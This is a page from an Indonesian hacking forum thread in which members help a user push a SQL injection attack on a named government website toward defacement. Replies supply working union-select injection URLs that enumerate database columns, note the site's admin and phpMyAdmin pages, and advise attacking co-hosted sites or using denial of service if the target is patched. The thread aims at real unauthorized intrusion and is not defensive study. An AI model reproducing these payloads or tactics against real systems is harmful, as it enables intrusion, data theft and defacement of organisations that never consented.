Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/

ask : cara terusin deface

http://xcode.or.id/forum/viewtopic.php?f=99&t=38773

Page 1 of 2

ask : cara terusin deface

Posted: Wed Apr 21, 2010 10:11 pm
by shinichi81
Bos,maap mo minta bantuan,saya coba inject web ini tapi keluar tulisannya : mysql_fetch_assoc()

nama web --> http://www.dotr.gov.ge/geo/news.php?id=99
poc ----> http://www.dotr.gov.ge/geo/news.php?id= ... e=0xhexa--

tetapi keluar tulisannya :

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dotrgovg/domains/dotr.gov.ge/public_html/geo/include_news.php on line 21

apakah itu bisa saya teruskan lagi atau tidak bos,mohon bimbingannya.makasih suhu :kaca: :kaca: :kaca:

Re: ask : cara terusin deface

Posted: Wed Apr 21, 2010 10:36 pm
by Xshadow

Code: Select all

http://www.dotr.gov.ge/geo/news.php?id=-99+union+select+1,2,group_concat(column_name),4,5,user(),7,8+from+information_schema.columns+where+table_name=0xhexa--
table_name=0xhexa--

baca tutornya sekali lagi :) yang saya tebelin dan berwarna merah itu apa... tolong dibaca dengan jeli tutorialnya :)
nech buat kamu :)
baca dengan baik ya...

Code: Select all

http://www.forkliftpartsmanual.com/anu.html
buka tuh halaman :)

Re: ask : cara terusin deface

Posted: Thu Apr 22, 2010 12:27 am
by ecko
shinichi81 wrote:Bos,maap mo minta bantuan,saya coba inject web ini tapi keluar tulisannya : mysql_fetch_assoc()

nama web --> http://www.dotr.gov.ge/geo/news.php?id=99
poc ----> http://www.dotr.gov.ge/geo/news.php?id= ... e=0xhexa--

tetapi keluar tulisannya :

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dotrgovg/domains/dotr.gov.ge/public_html/geo/include_news.php on line 21

apakah itu bisa saya teruskan lagi atau tidak bos,mohon bimbingannya.makasih suhu :kaca: :kaca: :kaca:
itu web kyanya udh di patch deh....kaga bisa login ke adminnya :
http://www.dotr.gov.ge/admin/

:mati: :mati: :mati:

Re: ask : cara terusin deface

Posted: Thu Apr 22, 2010 7:54 am
by 3xtr3m3b0y
ecko wrote: itu web kyanya udh di patch deh....kaga bisa login ke adminnya :
http://www.dotr.gov.ge/admin/

:mati: :mati: :mati:
Bukan dipatch, halaman Admin gak bisa konek ke Database Server.
Ada halaman menarik neh http://www.dotr.gov.ge/phpmyadmin/

Re: ask : cara terusin deface

Posted: Thu Apr 22, 2010 7:55 am
by shinichi81
kalau udah di patch,bagaimana cara inject-nya lagi yah?? sepertinya beda caranya yah?? bisa diberi tutor bos,kalau mo inject web yang udah di patch :kaca: :kaca:

Re: ask : cara terusin deface

Posted: Thu Apr 22, 2010 8:30 am
by 3xtr3m3b0y
shinichi81 wrote:Bos,maap mo minta bantuan,saya coba inject web ini tapi keluar tulisannya : mysql_fetch_assoc()

nama web --> http://www.dotr.gov.ge/geo/news.php?id=99
poc ----> http://www.dotr.gov.ge/geo/news.php?id= ... e=0xhexa--

tetapi keluar tulisannya :

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/dotrgovg/domains/dotr.gov.ge/public_html/geo/include_news.php on line 21

apakah itu bisa saya teruskan lagi atau tidak bos,mohon bimbingannya.makasih suhu :kaca: :kaca: :kaca:
Pada bagian table_name gak perlu pke bilangan HEXA, cukup pke STRING aja, karena directive magic_quotes_gpc = off, sehingga kita bisa menggunakan STRING.

Untuk mengeceknya :

Code: Select all

http://www.dotr.gov.ge/eng/news.php?id=-99+union+select+1,2,3,4,5,'test pke string',7,8--
Jika kemudian gak error 'n muncul teks test pke string, maka kita bisa menggunakan string.

Jadi alamat URL sebelumnya akan seperti ini :

Code: Select all

http://www.dotr.gov.ge/eng/news.php?id=-99+union+select+1,2,3,4,5,group_concat(column_name),7,8+from+information_schema.columns+where+table_name='user'--

Re: ask : cara terusin deface

Posted: Thu Apr 22, 2010 8:41 am
by 3xtr3m3b0y
shinichi81 wrote:kalau udah di patch,bagaimana cara inject-nya lagi yah?? sepertinya beda caranya yah?? bisa diberi tutor bos,kalau mo inject web yang udah di patch :kaca: :kaca:
Jika halaman/file yg vuln sdh dipatch, kita bisa mencoba mencari halaman lain yg mungkin belum dipatch, atau dengan mencari jenis vuln lain yg mgkn ada pada web tsb. Klo ternyata sdh dipatch semuax, kita coba dgn teknik JUMPING ATTACK, kita ambil alih web lain yg satu server dgn web tsb, lalu coba masuk ke lokasi web target sebelumnya. Jika ternyata gak bisa juga 'n kita ttp kekeh buat matiin tuh web, bisa coba pke teknik DoS.

Mgkn teman yg lain bisa nambahin teknik ilmiah apalagi yg bisa kita gunakan...

Re: ask : cara terusin deface

Posted: Thu Apr 22, 2010 9:12 am
by shinichi81
makasih suhu2,jadi bertambah nih ilmunya :love: :love: :love: eh bos,kalau teknik JUMPING teh apaan yah :malumalu: :malumalu: :malumalu:

Re: ask : cara terusin deface

Posted: Thu Apr 22, 2010 10:50 am
by Xshadow
pelajari 1-1... kalo dah kelar baru bahas yang lain...

Re: ask : cara terusin deface

Posted: Thu Apr 22, 2010 11:00 am
by shinichi81
Xshadow wrote:pelajari 1-1... kalo dah kelar baru bahas yang lain...

Siap Bos Xshadow,nanti saya coba oprek lagi hehehe....Bos,kalau 1-1 teh apaan? atau maksudnya dari tahap pertama dilang lagi yah cari yang belum di patch :pusing: :pusing: :pusing:
All times are UTC+07:00
Page 1 of 2
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/